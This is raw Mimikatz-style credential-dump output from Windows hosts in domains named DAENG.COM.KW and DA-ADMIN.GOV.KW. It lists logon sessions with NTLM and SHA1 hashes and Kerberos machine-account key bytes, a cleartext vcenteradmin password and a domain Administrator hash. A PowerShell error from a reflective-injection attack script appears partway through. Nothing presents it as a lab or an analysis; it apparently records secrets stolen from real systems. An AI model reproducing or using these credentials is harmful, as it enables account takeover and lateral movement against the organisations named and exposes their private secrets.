	 * SHA1     : ebe1b445492a663f10d26f4290c25c5572c31800
	tspkg :	
	wdigest :	
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * Password : (null)
	kerberos :	
	 * Username : APPSVR$
	 * Domain   : DAENG.COM.KW
	 * Password : ca f1 bf e4 b3 47 a0 3c 5a f3 f2 07 2b 19 89 97 f5 1b 57 64 c7 c4 4e bc fc 93 19 e6 c1 c6 31 65 22 71 f5 14 73 03 91 44 0d c7 44 35 96 af 13 08 82 d7 9d ac 3d 0e 1d ab 77 2b 50 43 1f 28 39 bd f8 cb cc ad 2e 41 91 72 68 78 78 69 11 dd 80 81 5b c0 9e 0e 52 f0 8c ee 2f 6d da 5a c0 aa 51 e4 50 79 45 e0 8c 88 2e 1a f2 89 88 e7 20 69 30 9c aa 05 3d 20 22 b3 37 26 5b 05 a4 66 ef 8b ca 9e 8a 8e 23 ab 34 75 43 09 cd 21 b3 df b8 a5 0a 5f e8 ba 92 3c 58 60 3e 1d 6e bd 53 cc e9 b1 7b 07 1a 4b d4 88 be e7 f8 bf d8 20 d3 d9 40 db 66 3d 0c e7 1e bc 1b 93 6f 6e 6d 9d bc d7 8d bc 44 56 e8 99 7f 7d 98 ee 77 07 c0 72 fc fe b3 89 d7 05 83 65 a9 90 21 97 e7 48 fc 2c d2 dc b8 b0 ae dc e5 ed ed 51 06 9d 69 d5 50 ee b2 2a 9c 51 08 87 
	ssp :	
	credman :	

Authentication Id : 0 ; 362035 (00000000:00058633)
Session           : Service from 0
User Name         : MSSQLFDLauncher$SQLSERVER
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 12/15/2017 3:00:19 AM
SID               : S-1-5-80-3307563162-4282801494-901150658-3942236886-3477115101
	msv :	
	 [00000003] Primary
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * NTLM     : 4abab2c23eebce0f4dec16cda06e5672
	 * SHA1     : ebe1b445492a663f10d26f4290c25c5572c31800
	tspkg :	
	wdigest :	
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * Password : (null)
	kerberos :	
	 * Username : APPSVR$
	 * Domain   : DAENG.COM.KW
	 * Password : ca f1 bf e4 b3 47 a0 3c 5a f3 f2 07 2b 19 89 97 f5 1b 57 64 c7 c4 4e bc fc 93 19 e6 c1 c6 31 65 22 71 f5 14 73 03 91 44 0d c7 44 35 96 af 13 08 82 d7 9d ac 3d 0e 1d ab 77 2b 50 43 1f 28 39 bd f8 cb cc ad 2e 41 91 72 68 78 78 69 11 dd 80 81 5b c0 9e 0e 52 f0 8c ee 2f 6d da 5a c0 aa 51 e4 50 79 45 e0 8c 88 2e 1a f2 89 88 e7 20 69 30 9c aa 05 3d 20 22 b3 37 26 5b 05 a4 66 ef 8b ca 9e 8a 8e 23 ab 34 75 43 09 cd 21 b3 df b8 a5 0a 5f e8 ba 92 3c 58 60 3e 1d 6e bd 53 cc e9 b1 7b 07 1a 4b d4 88 be e7 f8 bf d8 20 d3 d9 40 db 66 3d 0c e7 1e bc 1b 93 6f 6e 6d 9d bc d7 8d bc 44 56 e8 99 7f 7d 98 ee 77 07 c0 72 fc fe b3 89 d7 05 83 65 a9 90 21 97 e7 48 fc 2c d2 dc b8 b0 ae dc e5 ed ed 51 06 9d 69 d5 50 ee b2 2a 9c 51 08 87 
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : APPSVR$
Domain            : DAENG
Logon Server      : (null)
Logon Time        : 12/15/2017 2:59:05 AM
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * Password : (null)
	kerberos :	
	 * Username : appsvr$
	 * Domain   : DAENG.COM.KW
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 168404 (00000000:000291d4)
Session           : Service from 0
User Name         : MSSQLServerOLAPService
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 12/15/2017 2:59:30 AM
SID               : S-1-5-80-2872255330-672591203-888807865-2791174282-1554802921
	msv :	
	 [00000003] Primary
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * NTLM     : 4abab2c23eebce0f4dec16cda06e5672
	 * SHA1     : ebe1b445492a663f10d26f4290c25c5572c31800
	tspkg :	
	wdigest :	
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * Password : (null)
	kerberos :	
	 * Username : APPSVR$
	 * Domain   : DAENG.COM.KW
	 * Password : ca f1 bf e4 b3 47 a0 3c 5a f3 f2 07 2b 19 89 97 f5 1b 57 64 c7 c4 4e bc fc 93 19 e6 c1 c6 31 65 22 71 f5 14 73 03 91 44 0d c7 44 35 96 af 13 08 82 d7 9d ac 3d 0e 1d ab 77 2b 50 43 1f 28 39 bd f8 cb cc ad 2e 41 91 72 68 78 78 69 11 dd 80 81 5b c0 9e 0e 52 f0 8c ee 2f 6d da 5a c0 aa 51 e4 50 79 45 e0 8c 88 2e 1a f2 89 88 e7 20 69 30 9c aa 05 3d 20 22 b3 37 26 5b 05 a4 66 ef 8b ca 9e 8a 8e 23 ab 34 75 43 09 cd 21 b3 df b8 a5 0a 5f e8 ba 92 3c 58 60 3e 1d 6e bd 53 cc e9 b1 7b 07 1a 4b d4 88 be e7 f8 bf d8 20 d3 d9 40 db 66 3d 0c e7 1e bc 1b 93 6f 6e 6d 9d bc d7 8d bc 44 56 e8 99 7f 7d 98 ee 77 07 c0 72 fc fe b3 89 d7 05 83 65 a9 90 21 97 e7 48 fc 2c d2 dc b8 b0 ae dc e5 ed ed 51 06 9d 69 d5 50 ee b2 2a 9c 51 08 87 
	ssp :	
	credman :	

Authentication Id : 0 ; 321919 (00000000:0004e97f)
Session           : Service from 0
User Name         : SQLAgent$SQLSERVER
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 12/15/2017 3:00:14 AM
SID               : S-1-5-80-2486726129-4149889652-1239639416-3994787198-3418491680
	msv :	
	 [00000003] Primary
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * NTLM     : 4abab2c23eebce0f4dec16cda06e5672
	 * SHA1     : ebe1b445492a663f10d26f4290c25c5572c31800
	tspkg :	
	wdigest :	
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * Password : (null)
	kerberos :	
	 * Username : APPSVR$
	 * Domain   : DAENG.COM.KW
	 * Password : ca f1 bf e4 b3 47 a0 3c 5a f3 f2 07 2b 19 89 97 f5 1b 57 64 c7 c4 4e bc fc 93 19 e6 c1 c6 31 65 22 71 f5 14 73 03 91 44 0d c7 44 35 96 af 13 08 82 d7 9d ac 3d 0e 1d ab 77 2b 50 43 1f 28 39 bd f8 cb cc ad 2e 41 91 72 68 78 78 69 11 dd 80 81 5b c0 9e 0e 52 f0 8c ee 2f 6d da 5a c0 aa 51 e4 50 79 45 e0 8c 88 2e 1a f2 89 88 e7 20 69 30 9c aa 05 3d 20 22 b3 37 26 5b 05 a4 66 ef 8b ca 9e 8a 8e 23 ab 34 75 43 09 cd 21 b3 df b8 a5 0a 5f e8 ba 92 3c 58 60 3e 1d 6e bd 53 cc e9 b1 7b 07 1a 4b d4 88 be e7 f8 bf d8 20 d3 d9 40 db 66 3d 0c e7 1e bc 1b 93 6f 6e 6d 9d bc d7 8d bc 44 56 e8 99 7f 7d 98 ee 77 07 c0 72 fc fe b3 89 d7 05 83 65 a9 90 21 97 e7 48 fc 2c d2 dc b8 b0 ae dc e5 ed ed 51 06 9d 69 d5 50 ee b2 2a 9c 51 08 87 
	ssp :	
	credman :	

Authentication Id : 0 ; 202777 (00000000:00031819)
Session           : Service from 0
User Name         : SQL Server Distributed Replay Client
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 12/15/2017 2:59:37 AM
SID               : S-1-5-80-3249811479-2167633679-2115734285-1138413726-166979568
	msv :	
	 [00000003] Primary
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * NTLM     : 4abab2c23eebce0f4dec16cda06e5672
	 * SHA1     : ebe1b445492a663f10d26f4290c25c5572c31800
	tspkg :	
	wdigest :	
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * Password : (null)
	kerberos :	
	 * Username : APPSVR$
	 * Domain   : DAENG.COM.KW
	 * Password : ca f1 bf e4 b3 47 a0 3c 5a f3 f2 07 2b 19 89 97 f5 1b 57 64 c7 c4 4e bc fc 93 19 e6 c1 c6 31 65 22 71 f5 14 73 03 91 44 0d c7 44 35 96 af 13 08 82 d7 9d ac 3d 0e 1d ab 77 2b 50 43 1f 28 39 bd f8 cb cc ad 2e 41 91 72 68 78 78 69 11 dd 80 81 5b c0 9e 0e 52 f0 8c ee 2f 6d da 5a c0 aa 51 e4 50 79 45 e0 8c 88 2e 1a f2 89 88 e7 20 69 30 9c aa 05 3d 20 22 b3 37 26 5b 05 a4 66 ef 8b ca 9e 8a 8e 23 ab 34 75 43 09 cd 21 b3 df b8 a5 0a 5f e8 ba 92 3c 58 60 3e 1d 6e bd 53 cc e9 b1 7b 07 1a 4b d4 88 be e7 f8 bf d8 20 d3 d9 40 db 66 3d 0c e7 1e bc 1b 93 6f 6e 6d 9d bc d7 8d bc 44 56 e8 99 7f 7d 98 ee 77 07 c0 72 fc fe b3 89 d7 05 83 65 a9 90 21 97 e7 48 fc 2c d2 dc b8 b0 ae dc e5 ed ed 51 06 9d 69 d5 50 ee b2 2a 9c 51 08 87 
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 12/15/2017 2:59:10 AM
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 100474 (00000000:0001887a)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 12/15/2017 2:59:10 AM
SID               : S-1-5-90-1
	msv :	
	 [00000003] Primary
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * NTLM     : 4abab2c23eebce0f4dec16cda06e5672
	 * SHA1     : ebe1b445492a663f10d26f4290c25c5572c31800
	tspkg :	
	wdigest :	
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * Password : (null)
	kerberos :	
	 * Username : APPSVR$
	 * Domain   : DAENG.COM.KW
	 * Password : ca f1 bf e4 b3 47 a0 3c 5a f3 f2 07 2b 19 89 97 f5 1b 57 64 c7 c4 4e bc fc 93 19 e6 c1 c6 31 65 22 71 f5 14 73 03 91 44 0d c7 44 35 96 af 13 08 82 d7 9d ac 3d 0e 1d ab 77 2b 50 43 1f 28 39 bd f8 cb cc ad 2e 41 91 72 68 78 78 69 11 dd 80 81 5b c0 9e 0e 52 f0 8c ee 2f 6d da 5a c0 aa 51 e4 50 79 45 e0 8c 88 2e 1a f2 89 88 e7 20 69 30 9c aa 05 3d 20 22 b3 37 26 5b 05 a4 66 ef 8b ca 9e 8a 8e 23 ab 34 75 43 09 cd 21 b3 df b8 a5 0a 5f e8 ba 92 3c 58 60 3e 1d 6e bd 53 cc e9 b1 7b 07 1a 4b d4 88 be e7 f8 bf d8 20 d3 d9 40 db 66 3d 0c e7 1e bc 1b 93 6f 6e 6d 9d bc d7 8d bc 44 56 e8 99 7f 7d 98 ee 77 07 c0 72 fc fe b3 89 d7 05 83 65 a9 90 21 97 e7 48 fc 2c d2 dc b8 b0 ae dc e5 ed ed 51 06 9d 69 d5 50 ee b2 2a 9c 51 08 87 
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : APPSVR$
Domain            : DAENG
Logon Server      : (null)
Logon Time        : 12/15/2017 2:59:10 AM
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * NTLM     : 4abab2c23eebce0f4dec16cda06e5672
	 * SHA1     : ebe1b445492a663f10d26f4290c25c5572c31800
	tspkg :	
	wdigest :	
	 * Username : APPSVR$
	 * Domain   : DAENG
	 * Password : (null)
	kerberos :	
	 * Username : appsvr$
	 * Domain   : DAENG.COM.KW
	 * Password : (null)
	ssp :	
	credman :	

C:\Windows\system32>



Update-ExeFunctions : Cannot bind argument to parameter 'ExeArguments' because 
it is an empty string.
At line:2359 char:140
+ ...  -ExeArguments $ExeArgs -ExeDoneBytePtr $ExeDoneBytePtr
+                    ~~~~~~~~
    + CategoryInfo          : InvalidData: (:) [Update-ExeFunctions], Paramete 
   rBindingValidationException
    + FullyQualifiedErrorId : ParameterArgumentValidationErrorEmptyStringNotAl 
   lowed,Update-ExeFunctions
 
20
Authentication Id : 0 ; 935083812 (00000000:37bc3f24)
Session           : RemoteInteractive from 2
User Name         : vcenteradmin
Domain            : DA-ADMIN
Logon Server      : DC
Logon Time        : 1/14/2018 7:49:29 PM
SID               : S-1-5-21-2515415950-3022153381-902338616-1110
	msv :	
	 [00000003] Primary
	 * Username : vcenteradmin
	 * Domain   : DA-ADMIN
	 * NTLM     : 3d43967cb7c24c905627c4240470dd90
	 * SHA1     : b3e1a265674f2a50fdd075aa211198a48754e847
	 [00010000] CredentialKeys
	 * NTLM     : 3d43967cb7c24c905627c4240470dd90
	 * SHA1     : b3e1a265674f2a50fdd075aa211198a48754e847
	tspkg :	
	wdigest :	
	 * Username : vcenteradmin
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : vcenteradmin
	 * Domain   : DA-ADMIN.GOV.KW
	 * Password : (null)
	ssp :	
	 [00000000]
	 * Username : vcenteradmin
	 * Domain   : DA-ADMIN
	 * Password : D@.Vc3nt3r@dm1n
	credman :	

Authentication Id : 0 ; 935069700 (00000000:37bc0804)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/14/2018 7:49:28 PM
SID               : S-1-5-90-2
	msv :	
	 [00000003] Primary
	 * Username : SYM-WIN2K2R2$
	 * Domain   : DA-ADMIN
	 * NTLM     : 43e75d4b726ac4345156f6afff66dfa3
	 * SHA1     : bb99aaa83d5c4201754b476bf88866938a6021e2
	tspkg :	
	wdigest :	
	 * Username : SYM-WIN2K2R2$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : SYM-WIN2K2R2$
	 * Domain   : da-admin.gov.kw
	 * Password : e2 35 2c f6 b1 e9 54 5b 5c 59 6e ed ed c0 6a cd ff 7f f3 9a 82 e4 ac e2 19 cc d0 01 24 21 46 77 35 46 af 4d bf 78 e7 0b 11 32 92 6e b6 c5 41 d8 38 0b 12 a0 96 94 7c e0 18 7f 19 79 d8 15 56 c0 46 90 8c 9e 99 4f d5 4f 4a 2f f4 e3 5c 29 bb 8f 48 4f 80 c7 08 a4 5d 00 2b e8 65 52 61 9c bd a9 74 a3 e3 22 fb 58 18 e6 1f 45 09 32 c6 4d 49 3b 30 5f 5c 6d f5 0a a9 79 c9 18 a8 10 bf 3e df fa 7f 0f c1 bf dc a8 14 a1 7f 5f 25 28 52 13 2a 4e f3 1e 39 08 d9 5a 89 af 41 a0 41 20 cc 5e 0b 67 f8 04 44 db 1f 65 c7 a1 7d df db 6f 02 79 2a f4 8e f8 8e ac ec c8 bf cd 35 23 1f 52 7d 14 94 f3 dc d1 02 d6 6f 60 96 30 9d 25 78 69 16 83 c6 84 88 46 12 de a9 4c f2 d4 ae 4b 0a ec f0 b9 c7 32 21 93 fc 2d a2 1d 24 fb fd a0 de e6 16 6a 33 a4 
	ssp :	
	credman :	

Authentication Id : 0 ; 172428 (00000000:0002a18c)
Session           : Service from 0
User Name         : SQLANYs_sem5
Domain            : NT SERVICE
Logon Server      : (null)
Logon Time        : 11/25/2017 10:49:32 AM
SID               : S-1-5-80-3784820641-2391269600-1434288029-1177689286-1786581930
	msv :	
	 [00000003] Primary
	 * Username : SYM-WIN2K2R2$
	 * Domain   : DA-ADMIN
	 * NTLM     : 43e75d4b726ac4345156f6afff66dfa3
	 * SHA1     : bb99aaa83d5c4201754b476bf88866938a6021e2
	tspkg :	
	wdigest :	
	 * Username : SYM-WIN2K2R2$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : SYM-WIN2K2R2$
	 * Domain   : da-admin.gov.kw
	 * Password : e2 35 2c f6 b1 e9 54 5b 5c 59 6e ed ed c0 6a cd ff 7f f3 9a 82 e4 ac e2 19 cc d0 01 24 21 46 77 35 46 af 4d bf 78 e7 0b 11 32 92 6e b6 c5 41 d8 38 0b 12 a0 96 94 7c e0 18 7f 19 79 d8 15 56 c0 46 90 8c 9e 99 4f d5 4f 4a 2f f4 e3 5c 29 bb 8f 48 4f 80 c7 08 a4 5d 00 2b e8 65 52 61 9c bd a9 74 a3 e3 22 fb 58 18 e6 1f 45 09 32 c6 4d 49 3b 30 5f 5c 6d f5 0a a9 79 c9 18 a8 10 bf 3e df fa 7f 0f c1 bf dc a8 14 a1 7f 5f 25 28 52 13 2a 4e f3 1e 39 08 d9 5a 89 af 41 a0 41 20 cc 5e 0b 67 f8 04 44 db 1f 65 c7 a1 7d df db 6f 02 79 2a f4 8e f8 8e ac ec c8 bf cd 35 23 1f 52 7d 14 94 f3 dc d1 02 d6 6f 60 96 30 9d 25 78 69 16 83 c6 84 88 46 12 de a9 4c f2 d4 ae 4b 0a ec f0 b9 c7 32 21 93 fc 2d a2 1d 24 fb fd a0 de e6 16 6a 33 a4 
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : SYM-WIN2K2R2$
Domain            : DA-ADMIN
Logon Server      : (null)
Logon Time        : 11/25/2017 10:47:46 AM
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : SYM-WIN2K2R2$
	 * Domain   : DA-ADMIN
	 * NTLM     : 43e75d4b726ac4345156f6afff66dfa3
	 * SHA1     : bb99aaa83d5c4201754b476bf88866938a6021e2
	tspkg :	
	wdigest :	
	 * Username : SYM-WIN2K2R2$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : sym-win2k2r2$
	 * Domain   : DA-ADMIN.GOV.KW
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 57240 (00000000:0000df98)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 11/25/2017 10:47:39 AM
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : SYM-WIN2K2R2$
	 * Domain   : DA-ADMIN
	 * NTLM     : 43e75d4b726ac4345156f6afff66dfa3
	 * SHA1     : bb99aaa83d5c4201754b476bf88866938a6021e2
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 935069737 (00000000:37bc0829)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/14/2018 7:49:28 PM
SID               : S-1-5-90-2
	msv :	
	 [00000003] Primary
	 * Username : SYM-WIN2K2R2$
	 * Domain   : DA-ADMIN
	 * NTLM     : 43e75d4b726ac4345156f6afff66dfa3
	 * SHA1     : bb99aaa83d5c4201754b476bf88866938a6021e2
	tspkg :	
	wdigest :	
	 * Username : SYM-WIN2K2R2$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : SYM-WIN2K2R2$
	 * Domain   : da-admin.gov.kw
	 * Password : e2 35 2c f6 b1 e9 54 5b 5c 59 6e ed ed c0 6a cd ff 7f f3 9a 82 e4 ac e2 19 cc d0 01 24 21 46 77 35 46 af 4d bf 78 e7 0b 11 32 92 6e b6 c5 41 d8 38 0b 12 a0 96 94 7c e0 18 7f 19 79 d8 15 56 c0 46 90 8c 9e 99 4f d5 4f 4a 2f f4 e3 5c 29 bb 8f 48 4f 80 c7 08 a4 5d 00 2b e8 65 52 61 9c bd a9 74 a3 e3 22 fb 58 18 e6 1f 45 09 32 c6 4d 49 3b 30 5f 5c 6d f5 0a a9 79 c9 18 a8 10 bf 3e df fa 7f 0f c1 bf dc a8 14 a1 7f 5f 25 28 52 13 2a 4e f3 1e 39 08 d9 5a 89 af 41 a0 41 20 cc 5e 0b 67 f8 04 44 db 1f 65 c7 a1 7d df db 6f 02 79 2a f4 8e f8 8e ac ec c8 bf cd 35 23 1f 52 7d 14 94 f3 dc d1 02 d6 6f 60 96 30 9d 25 78 69 16 83 c6 84 88 46 12 de a9 4c f2 d4 ae 4b 0a ec f0 b9 c7 32 21 93 fc 2d a2 1d 24 fb fd a0 de e6 16 6a 33 a4 
	ssp :	
	credman :	

Authentication Id : 0 ; 651679305 (00000000:26d7d649)
Session           : Service from 0
User Name         : semsrv
Domain            : NT SERVICE
Logon Server      : (null)
Logon Time        : 12/31/2017 8:23:03 AM
SID               : S-1-5-80-3958276243-2739099675-334681800-2039304502-2384811254
	msv :	
	 [00000003] Primary
	 * Username : SYM-WIN2K2R2$
	 * Domain   : DA-ADMIN
	 * NTLM     : 43e75d4b726ac4345156f6afff66dfa3
	 * SHA1     : bb99aaa83d5c4201754b476bf88866938a6021e2
	tspkg :	
	wdigest :	
	 * Username : SYM-WIN2K2R2$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : SYM-WIN2K2R2$
	 * Domain   : da-admin.gov.kw
	 * Password : e2 35 2c f6 b1 e9 54 5b 5c 59 6e ed ed c0 6a cd ff 7f f3 9a 82 e4 ac e2 19 cc d0 01 24 21 46 77 35 46 af 4d bf 78 e7 0b 11 32 92 6e b6 c5 41 d8 38 0b 12 a0 96 94 7c e0 18 7f 19 79 d8 15 56 c0 46 90 8c 9e 99 4f d5 4f 4a 2f f4 e3 5c 29 bb 8f 48 4f 80 c7 08 a4 5d 00 2b e8 65 52 61 9c bd a9 74 a3 e3 22 fb 58 18 e6 1f 45 09 32 c6 4d 49 3b 30 5f 5c 6d f5 0a a9 79 c9 18 a8 10 bf 3e df fa 7f 0f c1 bf dc a8 14 a1 7f 5f 25 28 52 13 2a 4e f3 1e 39 08 d9 5a 89 af 41 a0 41 20 cc 5e 0b 67 f8 04 44 db 1f 65 c7 a1 7d df db 6f 02 79 2a f4 8e f8 8e ac ec c8 bf cd 35 23 1f 52 7d 14 94 f3 dc d1 02 d6 6f 60 96 30 9d 25 78 69 16 83 c6 84 88 46 12 de a9 4c f2 d4 ae 4b 0a ec f0 b9 c7 32 21 93 fc 2d a2 1d 24 fb fd a0 de e6 16 6a 33 a4 
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 11/25/2017 10:47:54 AM
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 84053 (00000000:00014855)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 11/25/2017 10:47:53 AM
SID               : S-1-5-90-1
	msv :	
	 [00000003] Primary
	 * Username : SYM-WIN2K2R2$
	 * Domain   : DA-ADMIN
	 * NTLM     : 36652fcee027ac455e2dfc9e80b5b1d7
	 * SHA1     : 4cbaba5ea70559d91b6188def099185e4efcc332
	tspkg :	
	wdigest :	
	 * Username : SYM-WIN2K2R2$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : SYM-WIN2K2R2$
	 * Domain   : da-admin.gov.kw
	 * Password : 69 e9 98 2c a1 ee e0 15 c0 0a c5 e6 c8 4d c7 8f b2 9f ca 5a 13 e2 3b f8 dc f4 f1 bb e8 07 83 71 b9 81 2f 60 35 60 bf 19 c1 d3 ca cd 94 b9 a1 6e f2 dd c8 46 ec 10 58 2f d2 28 0f cc 16 72 0c 0f 73 cc 69 8e ec 69 6a 40 25 6b 65 64 46 a1 ab 42 ac 32 31 3c 7f 1b f4 d1 cb f1 75 f1 29 80 d6 a3 a1 b7 ff 4b 8e 25 a9 3b da eb a5 f8 56 8e e7 f1 e9 4c 53 d3 4b 29 11 59 be ba 88 c3 04 b1 0f 22 6b 52 26 6b f8 a3 a5 e1 84 0d 2f ac bc e5 46 84 03 0b 55 68 89 5a 7f 7c d8 4b 14 13 f8 5c ba c1 3e db 9d c2 09 e7 cb 59 77 f5 f7 0c ff ab 4d a3 78 b1 61 3a 49 50 b1 d7 3f d0 ed 9a 7e 88 fe d0 e8 d6 ac a1 64 a3 0d 21 38 19 ec 94 ea 3a 43 a3 fe f7 2f a4 31 16 40 65 1b ea 7c 8a 97 52 ad fd 76 62 3d d8 a3 8c b9 56 22 09 da 05 fb d1 d5 6e 
	ssp :	
	credman :	

Authentication Id : 0 ; 554931574 (00000000:21139576)
Session           : Interactive from 1
User Name         : administrator
Domain            : DA-ADMIN
Logon Server      : DC
Logon Time        : 12/24/2017 10:46:10 AM
SID               : S-1-5-21-2515415950-3022153381-902338616-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : DA-ADMIN
	 * NTLM     : 31e1a67a38052bb98f7a62d5e96abea0
	 * SHA1     : 74ffeaaae8de645d0c91eaca99d3220818ed8efc
	 [00010000] CredentialKeys
	 * NTLM     : 31e1a67a38052bb98f7a62d5e96abea0
	 * SHA1     : 74ffeaaae8de645d0c91eaca99d3220818ed8efc
	tspkg :	
	wdigest :	
	 * Username : Administrator
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : administrator
	 * Domain   : DA-ADMIN.GOV.KW
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 144882 (00000000:000235f2)
Session           : Service from 0
User Name         : semwebsrv
Domain            : NT SERVICE
Logon Server      : (null)
Logon Time        : 11/25/2017 10:49:23 AM
SID               : S-1-5-80-948765316-811284391-187558744-2005173589-387111393
	msv :	
	 [00000003] Primary
	 * Username : SYM-WIN2K2R2$
	 * Domain   : DA-ADMIN
	 * NTLM     : 43e75d4b726ac4345156f6afff66dfa3
	 * SHA1     : bb99aaa83d5c4201754b476bf88866938a6021e2
	tspkg :	
	wdigest :	
	 * Username : SYM-WIN2K2R2$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : SYM-WIN2K2R2$
	 * Domain   : da-admin.gov.kw
	 * Password : e2 35 2c f6 b1 e9 54 5b 5c 59 6e ed ed c0 6a cd ff 7f f3 9a 82 e4 ac e2 19 cc d0 01 24 21 46 77 35 46 af 4d bf 78 e7 0b 11 32 92 6e b6 c5 41 d8 38 0b 12 a0 96 94 7c e0 18 7f 19 79 d8 15 56 c0 46 90 8c 9e 99 4f d5 4f 4a 2f f4 e3 5c 29 bb 8f 48 4f 80 c7 08 a4 5d 00 2b e8 65 52 61 9c bd a9 74 a3 e3 22 fb 58 18 e6 1f 45 09 32 c6 4d 49 3b 30 5f 5c 6d f5 0a a9 79 c9 18 a8 10 bf 3e df fa 7f 0f c1 bf dc a8 14 a1 7f 5f 25 28 52 13 2a 4e f3 1e 39 08 d9 5a 89 af 41 a0 41 20 cc 5e 0b 67 f8 04 44 db 1f 65 c7 a1 7d df db 6f 02 79 2a f4 8e f8 8e ac ec c8 bf cd 35 23 1f 52 7d 14 94 f3 dc d1 02 d6 6f 60 96 30 9d 25 78 69 16 83 c6 84 88 46 12 de a9 4c f2 d4 ae 4b 0a ec f0 b9 c7 32 21 93 fc 2d a2 1d 24 fb fd a0 de e6 16 6a 33 a4 
	ssp :	
	credman :	

Authentication Id : 0 ; 935083719 (00000000:37bc3ec7)
Session           : RemoteInteractive from 2
User Name         : vcenteradmin
Domain            : DA-ADMIN
Logon Server      : DC
Logon Time        : 1/14/2018 7:49:29 PM
SID               : S-1-5-21-2515415950-3022153381-902338616-1110
	msv :	
	 [00000003] Primary
	 * Username : vcenteradmin
	 * Domain   : DA-ADMIN
	 * NTLM     : 3d43967cb7c24c905627c4240470dd90
	 * SHA1     : b3e1a265674f2a50fdd075aa211198a48754e847
	 [00010000] CredentialKeys
	 * NTLM     : 3d43967cb7c24c905627c4240470dd90
	 * SHA1     : b3e1a265674f2a50fdd075aa211198a48754e847
	tspkg :	
	wdigest :	
	 * Username : vcenteradmin
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : vcenteradmin
	 * Domain   : DA-ADMIN.GOV.KW
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 84035 (00000000:00014843)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 11/25/2017 10:47:53 AM
SID               : S-1-5-90-1
	msv :	
	 [00000003] Primary
	 * Username : SYM-WIN2K2R2$
	 * Domain   : DA-ADMIN
	 * NTLM     : 43e75d4b726ac4345156f6afff66dfa3
	 * SHA1     : bb99aaa83d5c4201754b476bf88866938a6021e2
	tspkg :	
	wdigest :	
	 * Username : SYM-WIN2K2R2$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : SYM-WIN2K2R2$
	 * Domain   : da-admin.gov.kw
